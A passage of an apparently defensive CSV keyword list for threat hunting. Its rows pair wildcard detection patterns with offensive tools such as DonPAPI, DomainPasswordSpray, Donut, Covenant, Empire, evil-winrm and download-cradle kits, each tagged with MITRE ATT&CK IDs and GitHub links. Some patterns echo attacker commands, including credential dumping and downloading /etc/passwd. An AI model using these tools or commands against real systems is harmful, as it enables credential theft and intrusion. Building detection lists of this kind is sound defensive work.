Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*DomainPasswordSpray*","offensive_tool_keyword","DomainPasswordSpray","DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain. By default it will automatically generate the userlist from the domain. BE VERY CAREFUL NOT TO LOCKOUT ACCOUNTS!","t1110 - T1114 - T1555","TA0006 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/dafthack/DomainPasswordSpray","1","1","N/A","N/A","10","1498","354","2023-09-22T22:13:14Z","2016-10-04T23:37:37Z" +"*DomainRecon*ridbrute*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*DomainRecon/ADCS*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*DomainRecon/BloodHound*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*DomainRecon/SilentHound*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*DomainRecon\ADCSServer.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*DomainRecon\DC-IPs.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*DomainRecon\ExploitableSystems.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*DomainRecon\OxidBindings.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*DomainRecon\Windows_Servers.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*DomainTrustDiscovery_PowerView.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*domcachedump.py*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*dome.py *","offensive_tool_keyword","DOME","DOME - A subdomain enumeration tool","T1583 - T1595 - T1190","TA0011 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/v4d1/Dome","1","0","N/A","N/A","4","376","52","2022-03-10T12:08:17Z","2022-02-20T15:09:40Z" +"*DominicBreuker*","offensive_tool_keyword","Github Username","Github username hosting exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/DominicBreuker","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*DominicBreuker/pspy*","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","N/A","6","10","4030","449","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" +"*donapapi -pvk *","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*donate.v2.xmrig.com:3333*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*DoNotUseThisPassword123!*","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","0","N/A","10","4","320","38","2023-09-22T21:30:50Z","2020-11-23T19:21:06Z" +"*DonPAPI ""$DOMAIN""/*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*donpapi -credz *","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*DonPAPI.py *","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*donpapi_dump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*donpapi-master.zip*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*donut -f *.dll -c * -m RunProcess*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*donut -f c2.dll*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*donut* \DemoCreateProcess.dll *","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"*donut.exe *.exe*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"*DONUT_BYPASS_CONTINUE*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"*donut-loader -*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*Donut-Loader -process_id*","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021.006 - T1059.001 - T1059.003 - T1047","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/Hackplayers/evil-winrm","1","0","N/A","10","10","3763","566","2023-06-09T07:42:42Z","2019-05-28T10:53:00Z" +"*DonutLoader(*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"*DonutLoader.cs*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*donut-maker.py -*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*donut-maker.py -i *.exe*","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021.006 - T1059.001 - T1059.003 - T1047","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/Hackplayers/evil-winrm","1","0","N/A","10","10","3763","566","2023-06-09T07:42:42Z","2019-05-28T10:53:00Z" +"*donut-payload.*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"*donut-shellcode*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*donut-shellcode*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"*donut-shellcode*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" +"*dos-over-tor*","offensive_tool_keyword","dos-over-tor","Proof of concept denial of service over TOR stress test tool. Is multi-threaded and supports multiple attack vectors.","T1583 - T1090","TA0040 - TA0043","N/A","N/A","DDOS","https://github.com/skizap/dos-over-tor","1","0","N/A","N/A","1","10","11","2018-07-21T01:44:41Z","2018-07-26T07:05:37Z" +"*dothatlsassthing*","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access - Data Exfiltration","https://github.com/tastypepperoni/PPLBlade","1","0","N/A","10","4","324","36","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z" +"*dotnet ./Server.dll*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" +"*dotnet inline-execute *","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*dotnet Inveigh.dll*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","0","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z" +"*dotnet ParseMalleable/ParseMalleable.dll*","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","0","N/A","10","10","198","47","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z" +"*dotnet_serve_payload*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*DotNet2JSImplant*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*DotNetArtifactGenerator.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*DoubleAgent.sln*","offensive_tool_keyword","DoubleAgent","DoubleAgent gives the attacker the ability to inject any DLL into any process. The code injection occurs extremely early during the victims process boot. giving the attacker full control over the process and no way for the process to protect itself. The code injection technique is so unique that its not detected or blocked by any antivirus.DoubleAgent can continue injecting code even after reboot making it a perfect persistence technique to survive reboots/updates/reinstalls/patches/etc. Once the attacker decides to inject a DLL into a process. they are forcefully bounded forever. Even if the victim would completely uninstall and reinstall its program. the attackers DLL would still be injected every time the process executes.","T1055 - T1059 - T1053","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/Cybellum/DoubleAgent","1","1","N/A","N/A","10","1200","436","2022-08-24T10:32:36Z","2017-03-12T17:05:57Z" +"*douknowwhoami?d*","offensive_tool_keyword","cobaltstrike","Implement load Cobalt Strike & Metasploit&Sliver shellcode with golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/zha0gongz1/DesertFox","1","0","N/A","10","10","123","26","2023-02-02T07:02:12Z","2021-02-04T09:04:13Z" +"*download *bloodhound*","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*download *Roaming\mRemoteNG\confCons.xml*","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021 - T1028 - T1046 - T1078 - T1091 - T1219","TA0003 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/Hackplayers/evil-winrm","1","0","N/A","10","10","3763","566","2023-06-09T07:42:42Z","2019-05-28T10:53:00Z" +"*download /etc/passwd*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" +"*Download:Cradle.js*","offensive_tool_keyword","Payload-Download-Cradles","This are different types of download cradles which should be an inspiration to play and create new download cradles to bypass AV/EPP/EDR in context of download cradle detections.","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","1","N/A","N/A","3","241","54","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z" +"*Download_Cradles.*","offensive_tool_keyword","Payload-Download-Cradles","This are different types of download cradles which should be an inspiration to play and create new download cradles to bypass AV/EPP/EDR in context of download cradle detections.","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","1","N/A","N/A","3","241","54","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z" +"*Download_Execute*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*DownloadAndExtractFromRemoteRegistry*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*DownloadAndExtractFromRemoteRegistry*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Download-Cradles.cmd*","offensive_tool_keyword","Payload-Download-Cradles","This are different types of download cradles which should be an inspiration to play and create new download cradles to bypass AV/EPP/EDR in context of download cradle detections.","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","1","N/A","N/A","3","241","54","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z" +"*Download-Execute-PS*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 